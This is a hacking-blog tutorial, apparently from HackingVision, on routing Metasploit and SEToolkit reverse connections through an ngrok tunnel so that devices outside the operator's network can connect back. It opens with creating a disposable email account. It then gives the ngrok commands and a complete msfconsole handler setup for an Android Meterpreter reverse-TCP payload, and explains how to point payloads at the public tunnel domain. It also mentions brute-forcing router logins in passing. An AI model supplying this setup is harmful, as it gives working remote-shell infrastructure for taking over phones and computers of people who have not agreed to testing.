How to Use Metasploit, SEToolkit Without Opening Ports Kali Linux
Use hacking tools without opening ports: It can be quite annoying when you have limited access to ports on a network this can cause problems when pentesting as you can only test traffic within the same network. Unless of course, you could open the correct ports from within the router default administration panel for whatever reason sometimes access to administration panels are forbidden for example if you are using a mobile hotspot, another example corporate networks hide their panels and some home routers that play up even when the tester has access to opening the ports. Unless they just haven’t had the time to brute force a login yet, most Wireless routers will only allow the administrator to open ports today you will learn how to route your connections through an external secure tunnel this will allow us to use various pentesting tools such as Metasploit & SEToolkit outside our network.
- First of all, create a disposable email address using getnada.com or similar disposable email service. getnada
- Download ngrok In your browser go to ngrok.com and choose a download that suits your CPU architecture. Ngrok is a website that provides secure TCP tunnels for free. Once the download has completed extract the Zip archive and then cd into it for example “cd ngrok”
- Install your auth token (auth code below is an example copy auth token from ngrok.com account. Copy the authentication code from your account in ngrok.com we will be using this to authenticate our tunnel. You can do this by going to the folder where ngrok is stored and using .”/ngrok authtoken yourauthtokenhere ” The authentication code will then be saved.
./ngrok authtoken UHTsJVmnmrninfibyuvtc_2b9xscccvdvdfsaq8f7z3
- To create your first secure tunnel use the command below to set up a tunnel on port 80 I’m using HTTP port 80 for SET use whatever port you would like ngrok to tunnel through.
./ngrok http 80
- Open the web interface at http://localhost:4040 to inspect and replay requests in a web browser of your choice. Starting Metasploit First you will need to start Ngrok using TCP commands as Metasploit will be using a reverse TCP connection. Open up a new terminal and start Metasploit using the command below.
./ngrok tcp 4444
Use your localhost to set srvhost and lhost.
set lhost 0.0.0.0 set lport 4444 set uripath /
Use port you used to set up ngrok as srvport this will help us with tunneling a Metasploit or SEToolkit session through the Internet.
In this tutorial, I will set a handler up using settings above for Ngrok. Many reading this guide could be using complete different exploits to minify confusion we will be showing you set up a Reverse TCP Metapreter Listener. This will help later when setting up tunnels with other pentesting tools that use reverse connections.
msfconsole msf > use multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 0.0.0.0 msf exploit(handler) > set srvhost 0.0.0.0 msf exploit(handler) > set srvport 4444 msf exploit(handler) > set uripath / msf exploit(handler) > exploit
When your creating Payloads for Metasploit you will need to include your tunnel and also the port you are using for Ngrok.
When creating payloads use the domain provided by Ngrok or you can ping the domain to receive an IP and use the IP address from the results use the same port for payload as your listener.
This will work as a tunnel for many more pentesting tools this tutorial is not only limited to Metasploit and SEToolkit. Consider sharing this tutorial on social media & with your friends thank you for supporting HackingVision we have listed some links below to help you create your TCP tunnels and payloads.
Feedback From Social Media
Please consider downloading Brave Browser by downloading Brave Browser through our website you won’t only be downloading a great privacy browser you will also be supporting (HackingVision.com). We are not using Google Ads as we respect our users privacy. We encourage you to use an Ad-blocker or a browser that has a built in ad-blocker and other privacy features such as VPN.
- Top 10 Phishing Tools - 10th April 2020
- Distributed Hash Cracking Hashcat Hashtopolis Tutorial - 30th March 2020
- Cracking Password Hashes with Hashcat Rule-based attack - 27th March 2020